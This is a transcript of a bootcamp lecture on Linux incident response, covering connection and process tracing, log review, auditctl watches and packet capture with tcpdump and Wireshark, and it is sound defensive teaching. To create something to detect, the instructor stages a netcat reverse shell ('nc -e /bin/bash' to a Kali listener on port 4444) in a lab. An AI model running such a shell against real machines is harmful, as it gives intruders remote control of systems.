Alrighty, so good afternoon, everybody. We've made it. We've made it to the very last session of the Illinois Tech CyberHawks Cyber Defense Bootcamp. So I hope you all had a wonderful time so far and are excited to kind of learn a little bit more about incident response. At least in terms of kind of what the general goal of today is up until now, we took a look at a few different areas. We took a look at how to set up our firewalls. So that would be our first line of defense, something very simple that we can go ahead and set up, get things going, and then it buys us a little bit more time, especially in let's say a competition scenario where you're very limited on time and you just want to have a solution that buys you additional time to get ready to go ahead and protect things even further. So we first took a look at firewalls, and then on Tuesday, we took a look at hardening. So at least in that scope, we were primarily looking at preventing some different forms of privilege escalation or different forms of attacks that happen if they manage to get onto your machine. So taking a look around, looking for misconfigurations, primarily related to different scheduled tasks and processes. That's typically one thing that at least we've seen is a fairly common element that they tend to include in those competition style things, but it could also be useful for protecting yourself if you were in, let's say, a work environment where maybe you're setting up these cron jobs and you want to make sure that you set them up properly so that they're not abused if someone were able to gain access. We didn't really talk too much in terms of, let's say, application level security. So let's say that you are maintaining some form of a website and you're using, let's say, some form of PHP or JavaScript or whatever. Maybe you have a database that's attached to it. We really didn't talk too much about that. In a lot of cases, those are very application specific. And so that would require a lot of deeper investigation, more research, and more looking around on the machine as you're going through there. So we didn't want to focus on that too much as part of this, but of course you could go really deep and you could really kind of investigate that further and become very proficient in that sort of defense as well. So we didn't cover it here, but I just kind of wanted to mention it to kind of get you a little bit more aware. But let's say that something does happen and someone does end up either gaining access or something like that. Today's lesson is really going to kind of talk through what are some of the things that you may want to look for. You've identified an intruder. What are things that you may want to do immediately? What are things you may want to look at while you're waiting for that to happen? As I mentioned, this is the last session, so thank you all for if you've been with all the Zoom sessions, if you've watched all the YouTube videos, thank you very much. We really appreciate it. This really kind of gives us some wonderful feedback, either while we're putting these sessions together or putting together future ones. It really helps a lot to get an idea of kind of how are we putting these together and so forth. All right. So let's say that something has breached your computer. One of the things you may be tempted to do is to immediately turn that computer off. And it's a normal instinct. Let's say that you're in a competition or you're working there directly on the terminal and something pops up. So one of the things that we've seen in competitions is a lot of time they usually call, I want to say it's wall. I don't remember the exact name, but you can basically print things to all terminals that are associated with the computer. And they may something like, aha, we've hacked you or something like that. And so a lot of times that's very scary. And so your first instinct is pound, hit the power button, knock it off. However, you lose some valuable information when you do that. So for one thing, you lose active connection information. So let's say that there's an IP address on a port that's associated with it. Yes, you've canceled that, but you've lost that information for the time being. And that can cause some issues in terms of, okay, if I'm looking through my logs, I can quickly look for, okay, I'm looking at my active connections on my machine. I see something from a given IP address. If I'm looking in my logs, I can associate that very quickly and figure out exactly what that user or whoever that was attempting to do. That would be one thing that you may lose. Another thing that you'll most likely lose is your memory or your RAM. And so whatever running processes are on the machine, anything that's actively going on, the moment you hit that power button, you're going to most likely, if not all the time, lose that information. So that could be very insightful because with different types of programs, and a lot of times we have these more automated systems, let's say like Metasploit, they give you the opportunity and they allow you to inject yourself into other running processes. And so you may have something that, okay, for whatever reason, they've injected and they've moved over to a more valid process or program, and you're looking in the logs and it's this program that's doing things and you're trying to figure out how or why that happened. And so you lose that information if you were to immediately turn off the computer. And of course, there's going to be different scenarios and different things that you're going to want to do the moment that an attack happens. So for instance, that you're at work or you're doing something, the first thing you're going to want to do is notify that incident response team. Most of the time, if your company has set up a proper incident response plan, you'll have some indication of who you're supposed to reach out to in something like that happens. But you're going to notify that incident response team if you have the capabilities to do that. And that's one of the great things, especially as we start to use more cloud infrastructure or a lot of virtual machines nowadays. Sometimes we'll host different applications in those. You can instantly take a snapshot of your RAM. You can instantly take a snapshot of what's going on that computer. And so you can save a lot of good forensics information. And then of course you'll then begin your incident response. And there's different things that you may want to do for that. But again, at work, the first thing you want to do is notify the incident response team. If you're on the incident response team, you may do some of the things today, but then it'll eventually lead into some forensics. You'll take a full image of the machine that you're working with. You'll take the hard disk, the hard drive. You'll find out more information about that. And there could be other tools that you may use further down the line, volatility, different things. Autopsy was a good one. And so there's all sorts of different things. But again, that's in the forensics domain. That's going to be less of what we're looking at today. In a competition setting, you're just immediately going to go ahead and try and follow the attacker's footsteps. So you're going to immediately go in, you're going to say, okay, what are my active connections? Where are they coming from? I'm going to go into the logs. I'm going to go ahead and take a look at different logs that may exist within there and find out additional information in terms of what they're doing. So that's just generally speaking, what we recommend if there's an attack, immediately what's going on. You may attempt to kind of isolate that computer from other parts of the network. So that would be another good thing to do. And again, it really kind of depends on kind of what, especially in like a work scenario, what your incident response plan kind of dictates. And so have a good understanding of what their recommendations are to fit whatever circumstances or whatever system that you're working within. At least in terms of where at least we investigate. So for a competition level, and this is kind of where we're geared towards more today, is we just want to kind of find a few of the basic information. We want to see, okay, in a competition scenario, you're immediately trying to find, okay, how did they get in? Can we trace that down? Can we track that down? Can we figure out exactly how they got in? We're going to close that, and then we're going to reopen everything. In a work scenario, if you're an incident response team member, you may do a lot more work. Make sure that, okay, yes, we have closed that loophole. We have identified, okay, what did they maybe exfiltrate? But again, in a competition scenario, you're not necessarily fully looking into it. You're just finding how they got in, closing that loop, and then moving on. So at least in terms of where things that we would look at, we would look at established connections. And there's two different areas we could look at that. We could look at active shells. So we can look at, okay, if there's something that's actively connected to me, are they maybe still on the system? And then rogue processes. So there could be different processes that are currently running. What we've seen in the past is that they didn't launch an exploit, but rather maybe there was a scheduled task, or in one instance, we ended up seeing where they rewrote or they replaced a common service with something that was malicious, and it went ahead and did a whole bunch of stuff. And then second, we're going to look at some log analysis. Another tool that we use is we also take some live traffic analysis as well. So I'll kind of walk through exactly how we go ahead and do that a little bit later. But what we can do is we can go ahead and capture traffic on each of the devices within the network, and we can go ahead and port it into Wireshark, and that can be really good for getting an understanding of sort of what is actively going on at the time and what is happening. So that could be something that we could do. But at the very least, on the machine itself, you've got established connection and then log analysis as two good things that you would want to do. So first we have established connections. So again, we're going back to this, and we use this when we were looking at both the firewalls and then hardening. But you want to go ahead and you want to use netstat, or in some cases SS on more recent machines, is to kind of determine whether or not you have active connections on the machine. So I'm going to go ahead, and today I'm actually going to use my Cent website and then the Kali Linux machine. So we're going to use the Cent web and then Kali internal. So I'll go ahead and get that set up here. So we'll go ahead and do this, and we'll go ahead and do that. So I'll go ahead and clear my screen out from everything that I was doing before, and I'll go ahead and pull open my internal Kali machine. And you can see here, I already had Wireshark running here, so I'll close that out. We can go ahead and get things going. But essentially what we're going to be doing here, and you can kind of do this on most machines, but you can use what's known as netcat. And we used this when we were doing some of the introduction of the red team perspective. But in a lot of cases, you'll be using either a reverse shell. So in this case, we're going to be having the client, and they're going to go ahead and offer up a shell to a remote machine. So in this case, the client is going to go ahead and they're going to start the request over to the Kali Linux machine in this case to go ahead and try and get in. So in this case, on the Kali Linux machine, we're going to go ahead and have a listener. So we're going to go ahead and listen on port 4444. And it's just NC-NVLP. So we've got that. That's good to go. And on the CentOS side, all we're going to do is we're going to say NC. In this case, we're going to say E, and in this case, we're going to go ahead and give them a bash shell. We're going to list the IP address, so 192.168.0.5, and then we give the port. So we go ahead and do that, and we'll see in a second. So here we have connect to 192.168.0.5 from, in this case, unknown, but it gives us the IP address. It doesn't give us a fully formed shell, or at least that's not the right way to think of it, but if I go ahead and press who am I, we see that I'm logged in as root. I went ahead and did this as root. I'm going to go ahead and exit this out because there was one thing that I did slightly incorrectly here. So I'm going to go ahead and first I'm actually going to, I don't remember if tail etc password. I don't remember if I have a user named David on here. I do. So we'll go ahead and we'll switch over to David. SU David. We'll go ahead and do that. And we're going to go ahead and run the same command again. So in this case, we're going to do NC-E bin bash 192.168.0.5 and then I'm going to go ahead and put this and symbol. Essentially what this and symbol is going to do is it's going to throw this process, or it's going to throw this into the background, and it's going to still be running. And so when I go ahead and do that, I'm able to then go ahead and do other things. And that's essentially the main reason as to why we're going to do that. So we're going to go ahead and do that. It should be running in the background. And if I go ahead and jump over, we see this connect from. I can do who am I? And I see that I am David. So that's fantastic. We're good to go there. I'm going to go ahead and exit out of David. We should still have that shell there. So if I go ahead and jump back, I should be able to do like print working directory. Apparently I'm in the audit, the var/log directory. So that was left over from when I was doing things and investigating. And we can go ahead. I believe I have netstat on this machine. If we don't, we'll just use SS. So netstat, ANTLPU, ANTLPU. Okay, we have SS on this one, and you'll just kind of get a feel for it. Again, nowadays we use more of the SS rather than netstat, so that's just something that you may find more. So if we go ahead and look deeper into what we've got here, if we go ahead and take a look, if I go ahead and take a look at what we have, and I apologize, I don't know entirely what the camera view on YouTube is going to look like at the moment. So I will try my best to kind of verbally explain it and kind of highlight as much as I can. But if I go ahead and take a look here, we see a few different things. We see SSH, which we expect. We see the mail server again. For whatever reason, CentOS machines nowadays come pre-installed with it. I have no idea why. Then we see this weird 38498. I don't know if this is viewable, but at the very least, at least on the target, the peer address and the port is the expected 192.168.0.5 on port 4444. So I'll go ahead and I'm just going to actually pull out my highlighter here. Or not my highlighter, but I will go ahead and just kind of show you where I'm looking at on this. So if I go ahead and take a look, we see HTTP, and we got to go up one more. It's this one. It's the third one in the list. So this weird random port, we don't necessarily care about that, but we care about what the target port is. It is 4444. If you ever use anything with Metasploit, that's one of the more common default ports. So if you're ever doing any sort of incident response, you can get a good idea of what that is. If you see 4444, most likely that's somebody using some sort of Metasploit. They haven't changed anything, and that's typically reasonable, and you don't really expect it to change. But if you know how to change it, it is in the options, and you can change what that port is. So don't always just assume they'll always do it with 4444, but that's a common one if you're dealing with somebody who either doesn't change those options very often or is completely new to it and doesn't know how to change that. So that could be something that you may see. But again, that's what we expect. So we see, okay, we have this connection here on 192.168.0.5 on port 4444. So that is our bash shell. And we actually get some information here. So in this case, it actually tells us what program is running. And we gave them a bin bash shell. So as expected, it says bash. We get a process ID, which is 10359. And we actually get a little bit more information because it also indicates our netcat shell as well. So we see netcat and that we also have a process ID here as well. So that's pretty interesting. We can also go through, we see also that we have this port 80 here. So we have port 80, and that's just our web server, port 22 and port 25 again. So we see that. So we see, lovely, we see the setup here. We see that we caught it. We now know, okay, if I'm in the logs and I now know to look, okay, most likely there's something going on with this. It could be useful. Let's say that they compromise another machine in your device in your network, and they're using that to pivot around. And so now you know, hey, that's really bad. Let's say that this was not the 5. Let's say that because 5 is our Kali Linux machine. Let's say it was a 3. So that is our workstation. So if I saw 192.168.0.3, uh-oh, that means somebody else is on that other machine as well. And as a red teamer, sometimes that's something that we have to do. Sometimes we have to pivot around. Not every machine is going to be accessible just from the internet or is going to be accessible from that router that we went ahead and set up a few weeks back. And so that could be an issue that we might want to identify. So now we have this IP address. We now have a process ID. So now we're going to go ahead and we're actually going to start to drill down and find out some more information. If I wanted to, one of the things I could do is I could just kill that connection. In this case, I have 2 options. I can either kill the bash or the netcat, and either one will work. So if I go ahead and do kill 10359, we're going to go ahead and kill it. If I jump back over to my Kali Linux, we'll see that it has finished out. The connection's dead and it's not working anymore. And we'll go ahead and we will quickly show. I'll have to jump back into the David account, and we're going to go ahead and jump back in. And in this case, it actually tells us what the processes are. And we're going to go ahead and run SS again. And now it's on a new. And in this case, it went ahead and it actually, because we killed the bash shell, the netcat's actually still, for whatever reason, it didn't kill itself out. And so we still actually have that connection. There's nothing actually happening on there, but it's still waiting for it to die. And I could also, again, I could kill that netcat. So I can kill 10.0.4.0.1. If I jump back over to Kali Linux, that's gone as well. And you don't necessarily always want to do that, but that is something that you may want to do, is you may want to just crush the connection, get them out of here, and not have to worry about them being active anymore. So that's something that you could do. Again, unfortunately, I do have to switch back into the David account to go ahead and set up that again to kind of do a little bit more information. And of course, I don't have my netcat on right now, so we're going to go ahead and do this again. NCMBLP. We go ahead and jump in. And there we go. So we've gone ahead and done that. There we go. So we'll go ahead and clear. We can run SS again, and actually I'm going to exit, and we're going to go ahead and run Plunt again, and we see the new connection. And so now at this point, one thing that we may want to do, and I'll go ahead and pull my slides back up, but one thing that we may want to do is we want to find out more information. And so in this case, we see bash, so we see there's some sort of shell that's active. But we also see netcat. So in this case with SS, we actually got a lot of really good information. We got information in terms of the process that was running, but also the thing that spawned it. So we could just go ahead, okay, something opened a netcat shell. Most likely that means that either this is some sort of cron job, so I have to do some more investigation and find out exactly what's going on there. Something else called it in here, or somebody else got on the machine in some other process and then spawned a netcat shell. So that could be something that could be happening there, but we can kind of nail this down. We can use the PS utility. So in this case, we'll say PS, and there's other ways that you can monitor the running processes. So if I do PS, this is, I believe, is the processes they're running based on the root user. I use PSAUX, and this gives me more information on the overall system. And as you can see, there's a lot here. So a lot of the times I like to grep according to root, or in this case, we can grep according to users. So we can find out a few different things here in terms of what's going on with that. So I'm going to go ahead and clear this out. And if I do SS again, we can go ahead and take a look at what process. So in this case, I'm only going to trace down this 10.4.27. So PS-P 10.0.4.27. I don't know if I give AUX what'll happen. Yeah, that'll give me everything. I just want 10.0.4.7. So we see there's some sort of bash. We expect that. That's really all that we saw. And we actually got that information. But if you were using something like netstat, you may need a little bit more. But we may want to actually find out more about what the parent processes are. So on CentOS, it's a little bit tricky. On Ubuntu, we can use what's known as PS tree. It saves a lot of time. But in this case, I'm actually going to use we're gonna use a little bit of a roundabout way to do this on a CentOS machine. So we're gonna go ahead and we're actually gonna find out what the session is. So we get session, we get the session number is 1182. And then if we go ahead and use that information to draw out a forest, we can find out more information. So in this case, we see here, we see netcat and bash. So the 10.0, there's 10.4.27. That was bash, and then bash was in the same session as this netcat. Now we see these other two. We see this bash and this PS because I initially spawned that netcat in my root. I was in root. I switched over to David, and then I went ahead and spawned it, but it had the same parent, and so that's why we see both sets in this setup. Another command that we could run is we could just do ps-ef and then forest, and this will do it for the entire operating system. And so if I do more, and I'll run it again, so we'll just do this. ps-ef-s forest, and we can then see everything. So we see a lot of stuff that was spawned on startup. So we see a watchdog, some stuff with IPv6. The BIOS apparently was doing a little bit. A lot of this we can kind of ignore. But as we kind of go through, we start to see more stuff. So in this case, we see login. This is us. This is me right now. We see login as root. It gave us bash. And then we see PS. So we see those two commands. We see some other stuff that's going on here. And then finally, we see at the very bottom here, David is running that netcat shell and throwing it bin bash. So we see that there. So that would be one thing that you could do. If I were to go ahead and if I were to throw up my Ubuntu workstation, so let's go ahead and throw that one up. We can use PS tree, and I love PS tree because it's a little bit easier than doing it the other way, but it still functions just as well. So if I go ahead and clear this out and I do PS tree, it's a little bit prettier, as you can see. We get systemd, which is the services, and it just went ahead and is everything else that's running. In this case, the NC is not going to work. So we actually have to install ncat. So if I do apt install ncat, so we'll go ahead and install that really quickly here. I don't know why NC doesn't work on Ubuntu, at least in terms of serving up that shell, but it is what it is. But in this case, we'll go ahead and spin this up on the Ubuntu machine. So I'll go ahead and kill, or actually I'll start a new one. So in this case, I'm going to leave that other shell. We may use it later just to kind of get a little bit of more further understanding. So if I were to go to NC, LP, and NVLP, we'll do on 1, 2, 3, 4. So we'll go ahead and listen there. And that is the same, it's the very same thing that we were doing before. And so it's ncat-e bin bash 192.168.0.5, and then 1, 2, 3, 4. And it should go ahead and spawn it for us. And we caught it. And again, I screwed it up again. I'm going to restart it, and I'm going to throw it into the background. So we'll go ahead and do this again. We're going to go ahead and do this. So we're going to give it the @ symbol, and then we're going to throw it in the background. Now, if I run netstat on this one, and TLPU, we're going to see this again. We're going to see this netcat TCP on 26.4.20. So in this case, PS3-P 26.4.20. And in this case, we see netcat spawned and bashing. In this case, I don't have an example of, like, let's say that they compromised a website and they ended up on the www data user, but the same process would be fairly similar. The reason that we do this is that this gives us a good indication of how they got in. And so in this case, we see netcat shell. Of course, with netcat, there's a lot of different ways in which they can get that spun up. Like I mentioned, you could have a cron job that goes ahead and sets out a shell out to the user. They could have remoted in through maybe SSH, and then they wanted to have another netcat shell just in case, another option, or they could have gotten it another way and started up their netcat. So we don't get to get too much. There's a lot of different areas that we can check after this. But let's say that it does revert back and it tells us, okay, there was something with www data, something associated with HTTPD. So in this case, we see Apache 2. If I were to do ps3-p 732, we see a lot here. So I'm actually going to give more. So we see Apache 2, and Apache 2 spawned a whole bunch of stuff. Most likely this is just how it deals with like multiple connections and trying to figure that out. But as you can see, there's a whole bunch of information here. And if you start to see, okay, what the heck, why is Apache 2 running ncat? Okay, that's a big issue. So that's just something that we may do that may be useful to you as you're kind of doing your incident response. So that would be a first step. So you'd use netstat or SS, depending on which utility that you have installed on there, and then you'd go from there. Then you'd find the source. Of course, you could also do other uses of PS. This is a lot harder, or not harder, but it's a lot more time intensive. So you could, again, PS tree, and then you see some weird stuff going on. And you see like, again, let's say Apache or HTTPD, depending on what you've got installed. Let's say that's running some stuff, and you're like, okay, that definitely should not be looking like that. So you can, of course, use that as well to go. We can also use the W command. So the W command is pretty good. I don't know if this is going to work necessarily. Sometimes W shows these kinds of shells, and they don't. So in this case, we only see TTY1. So TTY1, I believe it's terminal. I forget what exactly it stands for, but that's me. That's what I am. It's idle. It's just me running the W command. If you had other logins, you would see them here. So if I go ahead and I log in, if I run SSH on this machine, so SSH David at blah, blah, blah. I want to say the passphrase was 123. It could be ABC123. I don't remember. And it is just 123. And then I do the same thing if I run the W command. I will now see on PTS 0, we have another login from another one. So that could be another area that you may want to check out. Of course, you don't always see it. So in this case, with this netcat shell, it's not there. It's only going to typically work with SSH connections, or if you have a terminal connected, like a monitor or something. That's the only time that's gonna show up on that case. So that's just as a note that I wanted to make there. But W could be useful. You'll find some stuff sometimes that the red team has to log in through there to be able to gain access. Alrighty. So now next we have some log analysis. So you've identified, okay, let's say that something fishy is going on with Apache again. And now we're gonna do a little bit more investigation. Maybe we can nail down exactly what they abused in order to get there. Maybe we want to check out the Apache logs. So there's a few things that we want to take a look at. The main log location on most, if not all, Linux system is going to be var/log. Different services and different applications may put them in other places, and you can use etc configuration files. So like etc/apache2 or whatever, apache2.conf, sshd.conf, all those other fun configuration files. You can sometimes change the configure. You can change it so that the log files go somewhere else. That's always an option in some cases, but in this case, most of them are just going to throw it in the var/log directory. I have some examples here for CentOS and Ubuntu, but we'll go ahead and we're actually just going to kind of explore through both of those. So I'm on my CentOS machine. So if I go to var/log, we see quite a bit here. The first thing that I'm going to look at is, let's go ahead and look at last log. And so if I do last, and you can't actually, if I try to cat last log, it's going to not really show anything up. It's kind of weird. It doesn't format properly. So you're just going to say last. And so this is going to give you information regarding the system, primarily with reboots and then logins. So in this case, we had a reboot on the 12th. Now, I think the last time that I did a reboot apparently was on the 27th. So that was some information there. We can go ahead and take a look at messages, tail messages. Again, information regarding some logons. So if I we'll just kind of fully look through this one. We see, again, mainly root, some cleanup of temp directories. And this will be one of the primary things that you may look at. I believe this gives you a more general collection of things that are going on within the system. So as you can see here, we see some ping requests, some more sessions for root. Again, unfortunately, there's not too much that's going to be here, but if there are certain commands that are being called, you may see that as well. So we see a switch to David. So we see a change from a user to another user. I think that other one was related to a installation, daemon rotating log files. That's pretty normal. Starting cleanup. So that one again. So messages is also a good place to look. If you look at secure, that's additional information regarding connections or logins as well. So last, messages and secure are good places to look for those. So I'm going to go ahead and clear. Other stuff that you may want to look at, you may want to look at cron. So cron is going to give you some stuff related to the cron jobs that are running. And so if, let's say that they have a malicious cron job on there, you would see that it being executed. In this case, when we were doing stuff, we had a cron job that echoed hello into root/hello. So we see all those commands there that are being executed. Other stuff, there's a firewall one. There's one with the mail server. If I go into HTTPD, so this is with the website. So in this case, it keeps track of every web request that was made to the server. So in this case, we don't really have too much that's going on this website, but we see there was a GET request on this server from using wget, so we weren't doing too much. But if I were to go ahead and jump on over to the Kali Linux machine, oops, if I jump over to the Kali Linux machine and I go out to the website, so 192.168.0.2, hello world, and we go ahead and pop back on over and we cat it again. We see this time it's from Firefox. So that's pretty normal. But let's say that like someone's trying to brute force or someone's trying to do some sort of injection. A lot of times you can see that post request as well. So that could be something that you may want to use with that access log. I don't know if the error log is going to say anything. In this case, it's not. But in most cases, that could be something that we can get. Do note that they do, as you kind of saw with the messages, that they do rotate the log files, and they essentially just add on an extension here. So the most recent is going to be the one without the numbers and so on. So that's just something there. So this was just on your CentOS machine. If we go ahead and jump over to the Ubuntu machine, so if we go ahead and cd var/log. In this case, it would be Apache 2. So on the CentOS machine, we have HTTPD installed, but in this case, we have Apache 2. But there's other ones here. So in this case, we have last again is here. So we see when things were rebooted or when they were started up, when remote SSH connections were made. There is VSFTPD has one. So VSFTPD, cat VSFTPD.log. So we have a whole bunch of FTP connection requests in here. I did notice, and I thought this was pretty fun. But because I was running, let's see, because I was running this, because everybody can view the CentOS machine, I had a few requests from 10.0.10.35, and that's not the IP address of my router. So I thought that was interesting and not entirely sure what was going on there. But apparently on the 28th, someone was trying to do that. But I got that with the VSFTPD log, and there's nothing wrong with that. I made that open, and there's not too much difference between the environments. So I just thought that was cool. We have the auth.log here, some more stuff. This is more specifically with, I believe, with SSH. So in this case, we have some sessions open and closed here. So here we go, auth.log. What else do we have? APT. So if you have APT, and on CentOS, it was Yum, and so you can take a look at what was installed as well. So those are just some things that you can look at. I don't have too much, at least in terms of what you may be looking for today, because again, that would require some setup in terms of getting some of those attack chains ready to go. But you can get an idea in terms of, okay, we can look for when people logged in. If it's a website, we can look at, okay, what kind of request was made to the website. Maybe that's how they got in, and so on. So that's just as a note there. Here we go. Another fun thing that at least you could use is you can use a tool called Audit CTL, and you can use it to track different activity on the machine. And so if I go ahead and do this with the Ubuntu machine, and I know it's on the Cent machine, but let's go ahead and do it with the Ubuntu machine. I'm wondering if it's installed. If it's not installed, we'll jump back over. So if I run Audit CTL, okay, it's not on the Ubuntu machine. You'll have to install it on Ubuntu. So on the CentOS machine, Audit CTL. There we go. One thing that we can do is, for instance, we can tell it to monitor when something was written to. So if I do Audit CTL and I say -W, so the -W is the path. So in this case, let's say that I want to monitor, let's monitor root/hello world.txt. And then we're going to go ahead and set the permission. In this case, we want to monitor when it was written to. And we're going to say hello modify. Oh, not hello modify. So in this case, we're going to set up audit CTL. It's going to be taking a look at root/hello world.txt, and it's going to be looking for when it was written to. And then it's going to go ahead and launch a notification, or not a notification, but it's going to put it in the audit logs that somebody modified this file. So in this case, if I go ahead and vim, or I want to do nano et or root/hello world.txt. Okay, I don't know why that did not like that. So we're gonna go ahead and try that again with vim. Alrighty, so we're gonna just say hello world. Oops. Dang it. I was in full screen mode. So when I hit escape, it popped me out of full screen. So if I go into the audit log, so if I go into audit, and I go ahead and cat out audit.log, there's a lot here. This audits pretty much everything on the system. And so that's another good place that you may want to look. But if I do tail audit.log, we can see here, we can see type path message audit, item name, root hello world.txt. I'm actually just going to grep hello modify. Uh-oh. Grep, oops, sorry. We're going to grep it. And we see it here. So we say key, hello modify, and so that's how we can look for things. So like and for instance, in a competition setting, let's say that, okay, we know that nobody should be modifying etc password. Nobody should be modifying the cron jobs. That could be something that you may want to keep an eye on, and periodically you're going to go ahead and you're going to check out the files and say, oh, okay, hey, somebody did modify that. Let's track down who did it, when they did it. We get a little bit of information here. In this case, it says, okay, it was a successful edit. We got a PID in this case. So let's PS-P. The parent ID actually is 1182. So if I do PS-P 1182, it is bash. That's me. So it's on TTY1. That was me. And we knew it was me, but we got that information. If I tried to do, and in this case, you would want the parent ID because it has finished with the task. So if I try to do it on this guy, it's gone. So this was the actual process that edited it. Because it's finished out, it's closed, the editing is done. It's not going to show up there. Another cool thing that you could do is you can put an audit on a command run. So if I do audit CTL, -A always, exit, -F arch equals B64-F. I don't know exactly what all of the flags means, but in this case, what I'm looking for is I'm looking for whenever somebody who runs who am I. So in this case, who exec. In this case, spelled audit CTL wrong. So audit CTL. In this case, if I were to run who am I, and I can actually still do this with my shell over here. So if I jump back over to David as my shell, that is on the Ubuntu workstation, and I want to do this. This is still on the Ubuntu workstation. I want this here. So if I run who am I here, I get back David. If I were to check out who exec, oh, where did my mouse go? There it is. If I go ahead and check that out, and if I just do cat or tail audit.log grep who exec, in this case, it looks like that did not work. Let's see. Okay, what's going on here? Alrighty. Why did you not work? It could be because when I was setting stuff up the other day, maybe because maybe I already had one on who am I? Maybe that caused an issue. So we're gonna go ahead and we're gonna give it a second. I'm just gonna pop through here. I'm gonna see what was the command I ran the other day. So give me 1 second here while I track that down. Oh, and here, no, let's see. No, that's the same. I'm wondering, so if I were to cat and let's say who, so cat audit grep who. Interesting. Oh, yeah, I'm not entirely sure why that didn't show up, but at least in this case, and I played the same command, so I'm not entirely sure exactly what caused the issue here with this new one. But as you can see, whenever I ran who am I got a flag who am I exec. So I'm able to kind of start to track down, okay, when was a certain thing command ran. So if I wanted to find some sort of, if there was something that I figure, okay, an attacker is going to use this, or I want to figure out, or if like, let's say that it's a command that I still need to have on here. So let's say I need to grab files from somewhere, or I need to figure something out. We don't necessarily want to remove it, but maybe we want to keep it on there just to kind of keep an eye on if it was run. So we can use that here. We can see that some information. In this case, again, we get the PPID, so we get the parent ID, and you'll want to use the parent ID because the actual process is dead. Who am I was already called and it's done. So that would be something that you could then go ahead and track even more. So some things that I would recommend. So this is primarily in a competition sense. It's not as useful in like a work environment, but you could of course use it. But ones that I would look out for would be who am I? So a lot of times when we gain a shell on a remote machine, so if I take a look at it here, so if I were to look, you see we didn't really get any, we didn't see the shell. So just to double check, I ran the who am I command to make sure that I was on there. And as you can see, I did that and it worked. So that's one of the first things that we may attempt to do when we get onto the system. Other things that you might want to take a look for are, of course, Vim and Nano. So you still want to have those on there, but what you want to see when files were edited. By extension, you could use Echo as well. So Echo is another good one that you may want to use when you're putting things into a file. Additionally, you may want to also put a check on wget and curl. And the reason that I say those two is sometimes those attackers are going to be pulling files over from their Kali Linux machine in order to do further mayhem and mischief. And so we'll use wget and curl to do that. And so you want to monitor those two. If you really want to have fun with the red team, one thing that we wanted to do for a while is we've edited. So as you saw, user/bin/who am I, you can edit, you could basically replace that file. And so that could be a fun thing that you could do. Maybe don't actually have it print out the user, just have it print out something funny or kick them out of the system. So that's something that we could do that we've kind of thought about. We've pre-gamed, but we never actually implemented. But that could be something fun that you could do. But at least in this case, we're just monitoring when that sort of command was run and you're good to go from there. Another useful command could be using find -mtime and -mmin. So this is essentially going to look through this file system for things that have been modified. Of course, you don't want to do this on the full file system, as you can probably guess with something like the log files. Those are updated pretty regularly, if not by the second. And so you'll get those will return back. But if you have a specific directory that you're looking for, that could be something that you may want to monitor on as well. So you do find-mtime. That is going to basically tell you what was modified within a given day period. So if I do mtime-1, it'll tell me which ones were modified in the last day. And then mmin is going to tell me when modified based on minutes. I believe you can then like use the piping operator. And so like, for instance, I could say something along the lines of find-mmin plus 120 and then find-mmin minus 240. And essentially what this would do is this would give you a list, or it would give you a list, and then it would give you a list of things that were modified greater than 20 minutes ago, and then a list of things that were less than 20 minutes ago. So actually, let's try that. I don't know if that'll, oh no, because we don't have anything that was written more than an hour or 2 hours ago. So that's really not going to be as useful. So that could be something. I'll have to do a little bit of testing with that command, but at the very least, that could be something that you may want to investigate as. As I mentioned earlier, another tool that we have in our tool belt is to use live traffic analysis. In this case, we can use Wireshark. So in some environment instances, the switch will allow you to monitor in what's called promiscuous mode. And so essentially what you can do is you can look at the traffic that's just going over the general network. So whenever you send something, sometimes it'll be sent out in broadcast, especially if you're, let's say you're in a wireless network. I mean, you can't really stop the wireless signal from being transmitted. And everybody will see that. But on a switch network, a lot of times that's harder to do because those switches are going to actually be telling or actually going to be directing that traffic specifically to an individual computer. So in some cases, you get lucky and you're able to look at it within the network. But in other cases, you actually have to monitor on the machine. So in order to actually take a TCP dump, so in order to just dump and grab a whole bunch of traffic, you can use TCP dump. So if I go ahead and use TCP dump here, we'll go ahead and do this on the, it doesn't really matter. We can do it on either the Ubuntu machine. I don't know. Am I running, and now it's leaving you. Am I running a website? I am actually running a website on this one. I thought I deleted it, but maybe I didn't. Maybe I deleted it on another one by accident. So I apologize if I deleted your web server during one of the tutorials. But at the very least, like one thing that we could do is TCP dump. I'm going to go to my root directory, TCP dump -I for interface. In this case, on this Ubuntu machine, it is ENS18. And then you're going to say -W, you're going to write it to, in this case, I wanted to throw it to traffic.pcap. So we're going to go ahead and throw it there. So now it's listening. There's a few things that I could do here. So for instance, I know that on my workstation, I have a website apparently. Oh, there's nothing on that one. But in this case, I have a default web page. I have an FTP server on this machine. So if I go ahead and exit, so I'll clear that out. FTP David at that IP address, ABC123, ls. We're going to go on to pictures, ls, and we're going to get temp.txt. Go ahead and exit. Great. And so let's go ahead and kill our TCP dump here. And we're going to go ahead and use Python -m http.server. And we're going to go ahead and serve that. So we'll go ahead and download it right away from our Kali Linux machine. So we're going to go ahead and grab it. Go out back here. We're going to go ahead and grab traffic.pcap. I've already apparently done traffic.pcap, but we can go ahead and see this. So I go ahead and open it. And we see all the traffic that was grabbed. So we see here we have an HTTP set, and I can filter based on what I'm looking for. So let's say that I have a suspicion that it's some sort of web-based attack. I can go ahead and I can monitor what HTTP traffic was there. So I got just a general check on this website. I can actually, if I follow, so analyze, follow HTTP stream, I can follow this as a unique session, I believe. So we see the actual HTTP or HTML text that was transferred from this. I may be able to download it directly, but we see, as we can see here, this is the default Apache web server. So configuration layout for an Apache 2, this was the page that was pulled here. And this could be used if you're in a competition and they have a capture the flag style part to it. That could be something that you use there. If we remember, I had FTP. So if I could do FTP, we see FTP here. And we see everything here. So in this case, I see the user David. I see his password. So I see that I used ABC123. I see that they attempted to look for what was in it. We got the directory listing. And then we went and we grabbed temp.txt. We went ahead and grabbed it. So we see that transfer. I can go ahead and I can actually use export objects, and I can pull HTTP data. So I can pull down this file name here. So I can pull that down. I can save it. I can also export that FTP table as well. So in this case, FTP table that was incorrect. I can actually pull, let's see. In this case, I believe it was an empty file, so we're actually not going to get anything from it, unfortunately, because it was empty. But you'd be able to actually pull down that FTP data if there was data. In this case, unfortunately, I was silly and I downloaded an empty file. And you can kind of see it here, it's empty. But you could then actually download and save that file and identify what they did. So that would be useful if they're trying to exfiltrate stuff out of your network. That could be something that you could do there. So it would be good to actually do this live network traffic monitoring as well. That's another very useful tool that you can use in your repertoire as well. And then lastly, I just kind of wanted to briefly mention, we have what are known as intrusion detection systems and security information and event management systems. I only have a slide on IDS, and one that we've used previously, at least in some coursework that we've done, is known as Snort. It's an open source rule-based IDS, 